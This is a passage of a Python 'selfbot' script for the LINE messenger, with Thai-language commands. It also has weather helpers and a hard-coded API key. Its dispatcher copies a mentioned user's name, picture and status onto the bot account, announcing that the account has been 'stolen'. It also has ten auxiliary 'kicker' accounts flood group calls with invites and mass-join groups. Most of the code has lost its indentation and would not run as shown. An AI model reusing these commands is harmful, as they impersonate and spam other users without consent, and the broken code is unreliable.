    settings['myProfile']['videoProfile'] = profile.videoProfile
    # NOTE(review): called with no mid, unlike cloneProfile's
    # getProfileDetail(myMid) — presumably defaults to own profile; confirm.
    coverId = line.getProfileDetail()['result']['objectId']
    settings['myProfile']['coverId'] = str(coverId)
def restoreProfile():
    """Restore the profile previously saved by backupProfile().

    Reads the snapshot from the global ``settings['myProfile']`` and pushes
    it back through the module-level ``line`` client.
    """
    profile = line.getProfile()
    profile.displayName = settings['myProfile']['displayName']
    profile.statusMessage = settings['myProfile']['statusMessage']
    if settings['myProfile']['videoProfile'] == None:
        # Picture-only profile: re-download the saved picture, upload it,
        # then push the name/status update.
        profile.pictureStatus = line.downloadFileURL("http://dl.profile.line-cdn.net/{}".format(settings["myProfile"]["pictureStatus"]), saveAs="tmp/backupPicture.bin")
        line.updateProfilePicture(profile.pictureStatus)
        line.updateProfile(profile)
    else:
        # Video profile: restore name/status first, then re-upload the
        # saved picture together with its "/vp" video variant.
        line.updateProfile(profile)
        pict = line.downloadFileURL('http://dl.profile.line-cdn.net/' + settings['myProfile']['pictureStatus'], saveAs="tmp/pict.bin")
        vids = line.downloadFileURL( 'http://dl.profile.line-cdn.net/' + settings['myProfile']['pictureStatus'] + '/vp', saveAs="tmp/video.bin")
        changeVideoAndPictureProfile(pict, vids)
    coverId = settings['myProfile']['coverId']
    line.updateProfileCoverById(coverId)
def time_converter(time):
converted_time = datetime.fromtimestamp(
int(time)
).strftime('%I:%M %p')
return converted_time
def url_builder(city_id, api_key='6975b23cef6c84e7f26062ef1c913c0d', unit='metric'):
    """Build the OpenWeatherMap "current weather" request URL.

    Parameters:
        city_id: numeric city id — search yours in
            http://bulk.openweathermap.org/sample/city.list.json.gz
        api_key: OpenWeatherMap API key (obtain yours at
            http://openweathermap.org/); defaults to the key the script
            previously hard-coded.
        unit: 'metric' for Celsius, 'imperial' for Fahrenheit; the API
            default (no units param) would be Kelvin.

    Returns the full request URL as a string.
    """
    api = 'http://api.openweathermap.org/data/2.5/weather?id='
    return api + str(city_id) + '&mode=json&units=' + unit + '&APPID=' + api_key
def data_fetch(full_api_url):
    """Fetch *full_api_url* and return its JSON payload as a dict.

    Uses a ``with`` block so the connection is closed even when reading
    or decoding raises (the original leaked the handle on error).
    Raises URLError/HTTPError on network failure and JSONDecodeError on
    a malformed payload.
    """
    with urllib.request.urlopen(full_api_url) as resp:
        output = resp.read().decode('utf-8')
    return json.loads(output)
def data_organizer(raw_api_dict):
    """Flatten the raw OpenWeatherMap "current weather" JSON into the
    simple dict of fields the bot reports.

    Expects the standard OWM response sections ('sys', 'main', 'weather',
    'wind', 'clouds'); like the original, missing sections raise
    AttributeError/KeyError rather than being defaulted.
    """
    data = dict(
        city=raw_api_dict.get('name'),
        country=raw_api_dict.get('sys').get('country'),
        temp=raw_api_dict.get('main').get('temp'),
        temp_max=raw_api_dict.get('main').get('temp_max'),
        temp_min=raw_api_dict.get('main').get('temp_min'),
        humidity=raw_api_dict.get('main').get('humidity'),
        pressure=raw_api_dict.get('main').get('pressure'),
        sky=raw_api_dict['weather'][0]['main'],
        sunrise=time_converter(raw_api_dict.get('sys').get('sunrise')),
        sunset=time_converter(raw_api_dict.get('sys').get('sunset')),
        wind=raw_api_dict.get('wind').get('speed'),
        # BUGFIX: wind direction lives at wind.deg in the OWM response;
        # the original read a nonexistent top-level 'deg' (always None).
        wind_deg=raw_api_dict.get('wind').get('deg'),
        dt=time_converter(raw_api_dict.get('dt')),
        cloudiness=raw_api_dict.get('clouds').get('all')
    )
    return data
def data_output(to, data, prov):
    """Send a Thai-language weather report to chat *to*.

    ``data`` is the dict produced by data_organizer(); ``prov`` selects the
    province name (1..6).  Unknown codes send nothing, matching the
    original's fall-through behaviour.  Uses the module-level ``line``
    client.

    BUGFIX: the minimum temperature ("น้อยสุด") previously printed
    data['temp_max'] instead of data['temp_min'] in every branch.
    """
    m_symbol = ' °C'
    # The six branches differed only in the province name, so use a table.
    cities = {
        1: "เชียงใหม่",
        2: "อุบลราชธานี",
        3: "กรุงเทพมหานคร",
        4: "เพชรบูรณ์",
        5: "ขอนแก่น",
        6: "อยุธยา",
    }
    city = cities.get(prov)
    if city is None:
        return
    line.sendMessage(to, "สภาพอากาศ: " + city + "\nอุณหภูมิ: " + str(data['temp']) + m_symbol + "\n(มากสุด: " + str(data['temp_max']) + m_symbol + ", น้อยสุด: " + str(data['temp_min']) + m_symbol + ")\n\nแรงลม: " + str(data['wind']) + "\nความชื้น: " + str(data['humidity']) + "\nเมฆ: " + str(data['cloudiness']) + "%\nความดัน: " + str(data['pressure']) + "\nดวงอาทิตย์ขึ้น: " + str(data['sunrise']) + "\nดวงอาทิตย์ตก: " + str(data['sunset']) + "\n\nอัพเดทล่าสุด: " + str(data['dt']))
def executeCmd(msg, text, txt, cmd, msg_id, receiver, sender, to, setKey):
if cmd == 'logoutbot':
line.sendMessage(to, 'Bot will logged out')
sys.exit('##----- PROGRAM STOPPED -----##')
elif cmd == 'logoutdevicee':
line.sendMessage(to, 'Bot will logged outdevicee')
line.logout()
sys.exit('##----- line LOGOUT -----##')
elif cmd == 'reboot':
line.sendMessage(to, 'กำลังรีสตาร์ท♪')
restartProgram()
elif cmd == 'help':
line.sendReplyMessage(msg_id,to,help(),{'AGENT_LINK': 'line://ti/p/~jamekillover','AGENT_ICON': 'http://dl.profile.line-cdn.net/'+line.getContact(myMid).pictureStatus,'AGENT_NAME': 'รัตน์'})
elif text.lower() == 'login':
os.system('log')
line.sendReplyMessage(msg_id,to," 「 Reset Login 」\nType: Reset Login\nระบบกำลังประมวลผล...",{'AGENT_LINK': 'line://ti/p/~jamekillover','AGENT_ICON': 'http://dl.profile.line-cdn.net/'+line.getContact(myMid).pictureStatus,'AGENT_NAME': 'รัตน์'})
python = sys.executable
os.execl(python, python, * sys.argv)
elif cmd == 'helpbot':
kicker.sendReplyMessage(msg_id, to, helpbot(),contentMetadata={"MSG_SENDER_NAME":"188c17d367a9455e4b60f809f280003d867d4df7188c17d367a9455e7d4df7188c17d367a9455e188c17d367a9455e4b60f809f280003d867d4df7188c17d367a9455e7d4df7188c17d367a9455e5ee8776c4c58a0367a9455e4b60f80358c204u21d04f683a70e","MSG_SENDER_ICON":"https://media.giphy.com/media/T9qJa0lfRjXsQ/source.gif"})
elif cmd == 'speed':
start = time.time()
sendMentionxd(msg.to, sender, "「เริ่มทดสอนความตาย」 ", "")
elapsed_time = time.time() - start
line.sendMessage(msg.to, " %s เร็วมากพอแล้ว" % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ")
elif text.lower() == 'myspeed':
time0 = timeit.timeit('"-".join(str(n) for n in range(100))', number=1000)
str1 = str(time0)
start = time.time()
line.sendMessage(to,'ความเร็วในการประมวลผล\n' + str1 + 'วินาที')
elapsed_time = time.time() - start
line.sendMessage(to,'การตอบสนองต่อคำสั่ง\n' + format(str(elapsed_time)) + 'วินาที')
elif cmd == 'me':
key1 = myMid
line.sendReplyMessage(msg_id, to, None, contentMetadata={"MSG_SENDER_NAME":"188c17d367a9455e4b60f809f280003d867d4df","MSG_SENDER_ICON":"https://media.giphy.com/media/T9qJa0lfRjXsQ/source.gif",'mid': key1}, contentType=13)
elif cmd == "me2":
line.sendReplyMessage(msg_id,to, line.getContact(sender).displayName, contentMetadata = {'previewUrl': 'https://media.giphy.com/media/T9qJa0lfRjXsQ/source.gif', 'i-installUrl': 'line://app/1602687308-GXq4Vvk9?type=profile', 'type': 'mt', 'subText': "", 'a-installUrl': 'line://app/1602687308-GXq4Vvk9?type=profile', 'a-installUrl': ' line://app/1602687308-GXq4Vvk9?type=profile', 'a-packageName': 'line://app/1602687308-GXq4Vvk9?type=profile', 'countryCode': 'line://app/1602687308-GXq4Vvk9?type=profileID', 'a-linkUri': 'line://app/1602687308-GXq4Vvk9?type=profile', 'i-linkUri': 'line://app/1602687308-GXq4Vvk9?type=profile', 'id': 'line://app/1602687308-GXq4Vvk9?type=profile', 'text': 'รัตน์ไง', 'linkUri': 'line://app/1602687308-GXq4Vvk9?type=profile'}, contentType=19)
elif cmd == 'ออน':
runtime = time.time() - programStart
line.sendMessage(to,format_timespan(runtime))
elif cmd == 'author':
line.sendMessage(to, 'Author is linepy')
elif cmd == 'me3':
line.sendReplyMessage(msg_id, to,"Fn",contentMetadata={'vCard': 'BEGIN:VCARD\r\nVERSION:3.0\r\nPRODID:ANDROID 8.13.3 Android OS 4.4.4\r\nFN:\\'+line.getContact(sender).displayName+'\nTEL;TYPE=mobile:'+line.getContact(sender).statusMessage+'\r\nN:?;\\,\r\nEND:VCARD\r\n', 'displayName': line.getContact(sender).displayName},contentType=13)
elif cmd == 'ข้อมูล':
try:
arr = []
owner = "uabeb419b286e211b3716ce5062dc19d0"
creator = line.getContact(owner)
contact = line.getContact(myMid)
grouplist = line.getGroupIdsJoined()
contactlist = line.getAllContactIds()
blockedlist = line.getBlockedContactIds()
ret_ = "____________________________\n❨🍒❩ ข้อมูลทั้งหมด ❨🍒❩\n____________________________"
ret_ += "\n┃❨🌷❩ Line Name : {}".format(contact.displayName)
ret_ += "\n┃❨🌷❩ Groups : {}".format(str(len(grouplist)))
ret_ += "\n┃❨🌷❩ Friends : {}".format(str(len(contactlist)))
ret_ += "\n┃❨🌷❩ Blocked : {}".format(str(len(blockedlist)))
ret_ += "\n┃❨🌷❩ Version1 : Python3 Update"
ret_ += "\n┃❨🌷❩ Version2 : Premium server"
ret_ += "\n┃❨🌷❩ Server : Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-33-generic x86_64)"
ret_ += "\n┃❨🌷❩ Edit : 14-11-2018"
ret_ += "\n┃❨🌷❩ Creator : {}".format(creator.displayName)
ret_ += "\n____________________________"
line.sendMessage(to, str(ret_))
except Exception as e:
line.sendMessage(msg.to, str(e))
elif cmd == 'ตั้งค่า':
res = '╭───🍁 เช็คการตั้งค่า 🍁'
res += '\n├👊Auto Add : ' + bool_dict[settings['autoAdd']['status']][1]
res += '\n├👊Auto Join : ' + bool_dict[settings['autoJoin']['status']][1]
res += '\n├👊Auto Respond : ' + bool_dict[settings['autoRespond']['status']][1]
res += '\n├👊Auto Respond Mention : ' + bool_dict[settings['autoRespondMention']['status']][1]
res += '\n├👊Auto Read : ' + bool_dict[settings['autoRead']][1]
res += '\n├👊Setting Key : ' + bool_dict[settings['setKey']['status']][1]
res += '\n├👊Mimic : ' + bool_dict[settings['mimic']['status']][1]
res += '\n├👊Greetings Join : ' + bool_dict[settings['greet']['join']['status']][1]
res += '\n├👊Greetings Leave : ' + bool_dict[settings['greet']['leave']['status']][1]
res += '\n├👊Check Contact : ' + bool_dict[settings['checkContact']][1]
res += '\n├👊Check Post : ' + bool_dict[settings['checkPost']][1]
res += '\n├👊Check Sticker : ' + bool_dict[settings['checkSticker']][1]
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
line.sendMessage(to, parsingRes(res))
elif cmd == 'abort':
aborted = False
if to in settings['changeGroupPicture']:
settings['changeGroupPicture'].remove(to)
line.sendMessage(to, 'ยกเลิกเปลี่ยนรูปภาพกลุ่มเรียบร้อย')
aborted = True
if settings['changePictureProfile']:
settings['changePictureProfile'] = False
line.sendMessage(to, 'ยกเลิกเปลี่ยนรูปภาพโปรไฟล์เรียบร้อย')
aborted = True
if settings['changeCoverProfile']:
settings['changeCoverProfile'] = False
line.sendMessage(to, 'ยกเลิกเปลี่ยนรูปปกเรียบร้อย')
aborted = True
if not aborted:
line.sendMessage(to, 'ไม่สามารถยกเลิกได้\nไม่มีอะไรไห้ยกเลิก')
elif cmd.startswith("midcopy "):
target = removeCmd("midcopy", text)
if target is not None:
cloneProfile(target)
line.sendContact(to,myMid)
line.sendMessage(to,"คัดลอกบัญชีเรียบร้อยแล้ว")
elif cmd.startswith("ขโมย "):
if sender in myMid:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
if len(lists) != []:
ls = random.choice(lists)
cloneProfile(ls)
line.sendMessage(to,"🙄ได้ทำการขโมยบัญชีมึงเรียบร้อยแล้ว🙄")
elif cmd == "กลับคืน":
if sender in myMid:
try:
restoreProfile()
line.sendMessage(to, "🙄เรียกคืนสถานะบัญชีขโมยสำเร็จโปรดรอสักครู่🙄")
except Exception as e:
line.sendMessage(to, "ไม่สามารถเรียกคืนสถานะบัญชีได้")
line.sendMessage(msg.to, str(e))
elif cmd == "save":
if sender in myMid:
try:
backupProfile()
line.sendMessage(to, "บันทึกสถานะบัญชีเรียบร้อยแล้ว")
except Exception as e:
line.sendMessage(to, "ไม่สามารถบันทึกสถานะบัญชีได้")
line.sendMessage(msg.to, str(e))
elif cmd == 'speed2':
start = time.time()
sendMentionxd(msg.to, sender, "「เริ่มทดสอนความตาย」 ", "")
elapse = time.time() - start
line.sendMessage(to, ' %s เร็วมากพอแล้ว' % str(elapse),{'AGENT_ICON': 'https://i.imgur.com/GSE9LLM.gif','AGENT_NAME': 'รัตน์','AGENT_LINK': 'line://app/1608998163-Xxzr1PmV'})
elif cmd == 'หมู':
arr = []
mention = "@x\n"
text = msg.text[len("infome"):].strip()
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':myMid}
arr.append(arrData)
today = datetime.today()
future = datetime(2018,7,25)
hari = (str(future - today))
comma = hari.find(",")
hari = hari[:comma]
teman = line.getAllContactIds()
gid = line.getGroupIdsJoined()
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
h = line.getContact(myMid)
line.reissueUserTicket()
My_Id = line.profile.displayName + "\nMy id Line: http://line.me/ti/p/" + line.getUserTicket().id
text += mention+"TIME : "+datetime.strftime(timeNow,'%H:%M:%S')+" Thailand\nMy Group : "+str(len(gid))+"\nMy Friend: "+str(len(teman))+"\nMy Mid : "+h.mid+"\nMy Name : "+My_Id
line.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
elif text.lower() == 'เปลี่ยนวีดีโอ':
if wait["selfbot"] == True:
if msg._from in admin:
line.sendMessage(to, "กรุณารอ20-30นาที")
picture = line.downloadFileURL("https://i.imgur.com/83Z5C2f.png", saveAs="image.png")
video = line.downloadFileURL("https://www.saveoffline.com/get/?i=eAQRQWRnY9Rs3RTdn3jZUV6sNVQkzqsJ&u=qQaKnkcoKrbhu8sr0CiqKlFxpiiOvHUX", saveAs="video.mp4")
changeVideoAndPictureProfile(picture, video)
line.sendMessage(to, "เปลี่ยนเรียบร้อย")
elif cmd == 'test':
line.sendTextWithFooter(to, "Footer message", footerIconURL="https://os.line.naver.jp/os/p/" + line.profile.mid, footerText="Footer", footerURL="https://line.me/ti/p/wprfnIo55O")
line.sendMessage(to, 'Your Test',{'AGENT_LINK': 'line://app/1608998163-Xxzr1PmV','AGENT_ICON': 'https://i.imgur.com/GSE9LLM.gif','AGENT_NAME': 'วิไล'})
elif cmd == "Devil":
if wait["selfbot"] == True:
if msg._from in admin:
sendMention1(msg.to, sender, "☘ƑմçҟᎠҽѵìӀ☘ ", "")
sendMention2(msg.to, sender, "☘ƑմçҟᎠҽѵìӀ☘ ", "")
sendMention3(msg.to, sender, "☘ƑմçҟᎠҽѵìӀ☘ ", "")
sendMention4(msg.to, sender, "☘ƑմçҟᎠҽѵìӀ☘ ", "")
sendMention5(msg.to, sender, "☘ƑմçҟᎠҽѵìӀ☘ ", "")
sendMention6(msg.to, sender, "☘ƑմçҟᎠҽѵìӀ☘ ", "")
sendMention7(msg.to, sender, "☘ƑմçҟᎠҽѵìӀ☘ ", "")
sendMention8(msg.to, sender, "☘ƑմçҟᎠҽѵìӀ☘ ", "")
sendMention9(msg.to, sender, "☘ƑմçҟᎠҽѵìӀ☘ ", "")
sendMention10(msg.to, sender, "☘ƑմçҟᎠҽѵìӀ☘ ", "")
elif cmd == "เข้าระบบ":
if wait["selfbot"] == True:
if msg._from in admin:
try:
sendMention1(msg.to, sender, "「เสร็จแล้ว」 ", "เข้าระบบ")
sendMention2(msg.to, sender, "「เสร็จแล้ว」 ", "เข้าระบบ")
sendMention3(msg.to, sender, "「เสร็จแล้ว」 ", "เข้าระบบ")
sendMention4(msg.to, sender, "「เสร็จแล้ว」 ", "เข้าระบบ")
sendMention5(msg.to, sender, "「เสร็จแล้ว」 ", "เข้าระบบ")
sendMention6(msg.to, sender, "「เสร็จแล้ว」 ", "เข้าระบบ")
sendMention7(msg.to, sender, "「เสร็จแล้ว」 ", "เข้าระบบ")
sendMention8(msg.to, sender, "「เสร็จแล้ว」 ", "เข้าระบบ")
sendMention9(msg.to, sender, "「เสร็จแล้ว」 ", "เข้าระบบ")
sendMention10(msg.to, sender, "「เสร็จแล้ว」 ", "เข้าระบบ")
except Exception as e:
line.sendMessage(msg.to,"เกิดข้อผิดพลาด\n" +str(e))
elif cmd == "ระบบคิก":
if wait["selfbot"] == True:
if msg._from in admin:
try:
kicker.sendMessage(msg.to,responsename1)
kicker2.sendMessage(msg.to,responsename2)
kicker3.sendMessage(msg.to,responsename3)
kicker4.sendMessage(msg.to,responsename4)
kicker5.sendMessage(msg.to,responsename5)
kicker6.sendMessage(msg.to,responsename6)
kicker7.sendMessage(msg.to,responsename7)
kicker8.sendMessage(msg.to,responsename8)
kicker9.sendMessage(msg.to,responsename9)
kicker10.sendMessage(msg.to,responsename10)
except Exception as e:
line.sendMessage(msg.to,"เกิดข้อผิดพลาด\n" +str(e))
elif cmd == "คทบอท":
if wait["selfbot"] == True:
if msg._from in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': myMid}
line.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
line.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
line.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
line.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
line.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
line.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Fmid}
line.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Gmid}
line.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Hmid}
line.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Imid}
line.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Jmid}
line.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': g1MID}
line.sendMessage1(msg)
elif text.lower() == "ลบแชท คิก":
if wait["selfbot"] == True:
if msg._from in admin:
try:
kicker.removeAllMessages(op.param2)
kicker.sendMessage(msg.to,"в❍тѕ✪❶🙄ลบแชทเรียบร้อย")
kicker2.removeAllMessages(op.param2)
kicker2.sendMessage(msg.to,"в❍тѕ✪➋🙄ลบแชทเรียบร้อย")
kicker3.removeAllMessages(op.param2)
kicker3.sendMessage(msg.to,"в❍тѕ✪❸🙄ลบแชทเรียบร้อย")
kicker4.removeAllMessages(op.param2)
kicker4.sendMessage(msg.to,"в❍тѕ✪❹🙄ลบแชทเรียบร้อย")
kicker5.removeAllMessages(op.param2)
kicker6.sendMessage(msg.to,"в❍тѕ✪❺🙄ลบแชทเรียบร้อย")
kicker6.removeAllMessages(op.param2)
kicker6.sendMessage(msg.to,"в❍тѕ✪❻🙄ลบแชทเรียบร้อย")
kicker7.removeAllMessages(op.param2)
kicker7.sendMessage(msg.to,"в❍тѕ✪❼🙄ลบแชทเรียบร้อย")
kicker8.removeAllMessages(op.param2)
kicker8.sendMessage(msg.to,"в❍тѕ✪❽🙄ลบแชทเรียบร้อย")
kicker9.removeAllMessages(op.param2)
kicker9.sendMessage(msg.to,"в❍тѕ✪❾🙄ลบแชทเรียบร้อย")
kicker10.removeAllMessages(op.param2)
kicker10.sendMessage(msg.to,"в❍тѕ❶✪🙄ลบแชทเรียบร้อย")
line.sendReplyMessage(msg_id,to,"☠️в❍тѕ✪🙄✪ได้ลบประวัติแชทเรียบร้อย☠️")
except Exception as e:
line.sendMessage(msg.to,"เกิดข้อผิดพลาด\n" +str(e))
elif cmd == "แจก":
if wait["selfbot"] == True:
if msg._from in admin:
kicker.sendMessage(to, text=None, contentMetadata=None, contentType=9)
kicker2.sendMessage(to, text=None, contentMetadata=None, contentType=9)
kicker3.sendMessage(to, text=None, contentMetadata=None, contentType=9)
kicker4.sendMessage(to, text=None, contentMetadata=None, contentType=9)
kicker5.sendMessage(to, text=None, contentMetadata=None, contentType=9)
kicker6.sendMessage(to, text=None, contentMetadata=None, contentType=9)
kicker7.sendMessage(to, text=None, contentMetadata=None, contentType=9)
kicker8.sendMessage(to, text=None, contentMetadata=None, contentType=9)
kicker9.sendMessage(to, text=None, contentMetadata=None, contentType=9)
kicker10.sendMessage(to, text=None, contentMetadata=None, contentType=9)
elif cmd == "เชิญคิก":
if wait["selfbot"] == True:
if msg._from in admin:
try:
anggota = [Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Jmid]
line.inviteIntoGroup(msg.to, anggota)
kicker.acceptGroupInvitation(msg.to)
kicker2.acceptGroupInvitation(msg.to)
kicker3.acceptGroupInvitation(msg.to)
kicker4.acceptGroupInvitation(msg.to)
kicker5.acceptGroupInvitation(msg.to)
kicker6.acceptGroupInvitation(msg.to)
kicker7.acceptGroupInvitation(msg.to)
kicker8.acceptGroupInvitation(msg.to)
kicker9.acceptGroupInvitation(msg.to)
kicker10.acceptGroupInvitation(msg.to)
except Exception as e:
line.sendMessage(msg.to,"เกิดข้อผิดพลาด\n" +str(e))
elif cmd == "เปิดกันผี":
if wait["selfbot"] == True:
if msg._from in admin:
try:
ginfo = line.getGroup(msg.to)
line.inviteIntoGroup(msg.to, [g1MID])
line.sendMessage(msg.to,"Group 「"+str(ginfo.name)+"」 ทำการเปิดใช้งานโหมดป้องกันJS")
except Exception as e:
line.sendMessage(msg.to,"เกิดข้อผิดพลาด\n" +str(e))
elif cmd == "ไปหำ":
if wait["selfbot"] == True:
if msg._from in admin:
G = line.getGroup(msg.to)
kicker.leaveGroup(msg.to)
kicker2.leaveGroup(msg.to)
kicker3.leaveGroup(msg.to)
kicker4.leaveGroup(msg.to)
kicker5.leaveGroup(msg.to)
kicker6.leaveGroup(msg.to)
kicker7.leaveGroup(msg.to)
kicker8.leaveGroup(msg.to)
kicker9.leaveGroup(msg.to)
kicker10.leaveGroup(msg.to)
elif cmd == "ผีมา":
if msg._from in admin:
G = line.getGroup(msg.to)
ginfo = line.getGroup(msg.to)
G.preventedJoinByTicket = False
line.updateGroup(G)
invsend = 0
Ticket = line.reissueGroupTicket(msg.to)
g1.acceptGroupInvitationByTicket(msg.to,Ticket)
G = g1.getGroup(msg.to)
G.preventedJoinByTicket = True
g1.updateGroup(G)
elif cmd == "ผีออก":
if msg._from in admin:
G = line.getGroup(msg.to)
g1.leaveGroup(msg.to)
elif cmd == "รี" or cmd == "sp":
if wait["selfbot"] == True:
if msg._from in admin:
start = time.time()
kicker.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker.sendMessage(msg.to, " %s ƑմçҟᎠҽѵìӀ" % (elapsed_time))
start = time.time()
kicker2.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker2.sendMessage(msg.to, " %s ƑմçҟᎠҽѵìӀ" % (elapsed_time))
start = time.time()
kicker3.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker3.sendMessage(msg.to, " %s ƑմçҟᎠҽѵìӀ" % (elapsed_time))
start = time.time()
kicker4.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker4.sendMessage(msg.to, " %s ƑմçҟᎠҽѵìӀ" % (elapsed_time))
start = time.time()
kicker5.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker5.sendMessage(msg.to, " %s ƑմçҟᎠҽѵìӀ" % (elapsed_time))
start = time.time()
kicker6.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker6.sendMessage(msg.to, " %s ƑմçҟᎠҽѵìӀ" % (elapsed_time))
start = time.time()
kicker7.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker7.sendMessage(msg.to, " %s ƑմçҟᎠҽѵìӀ" % (elapsed_time))
start = time.time()
kicker8.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker8.sendMessage(msg.to, " %s ƑմçҟᎠҽѵìӀ" % (elapsed_time))
start = time.time()
kicker9.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker9.sendMessage(msg.to, " %s ƑմçҟᎠҽѵìӀ" % (elapsed_time))
start = time.time()
kicker10.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker10.sendMessage(msg.to, " %s ƑմçҟᎠҽѵìӀ" % (elapsed_time))
start = time.time()
elif "call" in msg.text.lower():
if msg.toType == 2:
sep = msg.text.split(" ")
resp = msg.text.replace(sep[0] + " ","")
num = int(resp)
try:
sendMention1(msg.to, sender, "「Call Ready」 ", "")
except:
pass
while range(1):
group = kicker.getGroup(to)
members = [mem.mid for mem in group.members]
for var in range(num):
kicker.acquireGroupCallRoute(to)
kicker.inviteIntoGroupCall(to, contactIds=members)
kicker2.acquireGroupCallRoute(to)
kicker2.inviteIntoGroupCall(to, contactIds=members)
kicker3.acquireGroupCallRoute(to)
kicker3.inviteIntoGroupCall(to, contactIds=members)
kicker4.acquireGroupCallRoute(to)
kicker4.inviteIntoGroupCall(to, contactIds=members)
kicker5.acquireGroupCallRoute(to)
kicker5.inviteIntoGroupCall(to, contactIds=members)
kicker6.acquireGroupCallRoute(to)
kicker6.inviteIntoGroupCall(to, contactIds=members)
kicker7.acquireGroupCallRoute(to)
kicker7.inviteIntoGroupCall(to, contactIds=members)
kicker8.acquireGroupCallRoute(to)
kicker8.inviteIntoGroupCall(to, contactIds=members)
kicker9.acquireGroupCallRoute(to)
kicker9.inviteIntoGroupCall(to, contactIds=members)
kicker10.acquireGroupCallRoute(to)
kicker10.inviteIntoGroupCall(to, contactIds=members)
sendMention1(msg.to, sender, "「Call End」 ", "")
break
else:
kicker.sendMessage(to,"คำสั่งนี้สามารถใช้ได้เฉพาะกลุ่ม")
#===========Protection============#
elif 'Po1 ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('กันลิ้ง ','')
if spl == 'on':
if msg.to in protectqr:
msgs = "URL Protect Start"
else:
protectqr.append(msg.to)
ginfo = line.getGroup(msg.to)
msgs = "URL Protect Start\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "👊STATUS PROTECT URL👊\n" + msgs)
elif spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
ginfo = line.getGroup(msg.to)
msgs = "URL Protect Trun off\nIn Group : " +str(ginfo.name)
else:
msgs = "URL Protect Trun off"
line.sendMessage(msg.to, "👊STATUS PROTECT URL👊\n" + msgs)
elif 'Po2 ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('กันเตะ ','')
if spl == 'on':
if msg.to in protectkick:
msgs = "Kick Member Protect Start"
else:
protectkick.append(msg.to)
ginfo = line.getGroup(msg.to)
msgs = "Kick Member Protect Start\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "👊STATUS PROTECT KICK👊\n" + msgs)
elif spl == 'off':
if msg.to in protectkick:
protectkick.remove(msg.to)
ginfo = line.getGroup(msg.to)
msgs = "Kick Member Protect Trun off\nIn Group : " +str(ginfo.name)
else:
msgs = "Kick Member Protect Trun off"
line.sendMessage(msg.to, "👊STATUS PROTECT KICK👊\n" + msgs)
elif 'Po3 ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('กันเชิญ ','')
if spl == 'on':
if msg.to in protecARoin:
msgs = "Joinkick Start"
else:
protecARoin.append(msg.to)
ginfo = line.getGroup(msg.to)
msgs = "Joinkick Start\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "👊STATUS PROTECT JOIN👊\n" + msgs)
elif spl == 'off':
if msg.to in protecARoin:
protecARoin.remove(msg.to)
ginfo = line.getGroup(msg.to)
msgs = "Joinkick Trun off\nIn Group : " +str(ginfo.name)
else:
msgs = "Joinkick Trun off"
line.sendMessage(msg.to, "👊STATUS PROTECT JOIN👊\n" + msgs)
elif 'Protectcanceljs ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectcanceljs ','')
if spl == 'on':
if msg.to in protectcanceljs:
msgs = "ป้องกันยกเลิกเชิญบอทเปิดใช้งาน"
else:
protectcanceljs[msg.to] = True
f=codecs.open('protectcanceljs.json','w','utf-8')
json.dump(protectcanceljs, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ป้องกันยกเลิกเชิญบอทเปิดใช้งาน\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "👊STATUS PROTECT CANCEL👊\n" + msgs)
elif spl == 'off':
if msg.to in protectcanceljs:
del protectcanceljs[msg.to]
f=codecs.open('protectcanceljs.json','w','utf-8')
json.dump(protectcanceljs, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ป้องกันยกเลิกเชิญบอทปิดใช้งาน\nIn Group : " +str(ginfo.name)
else:
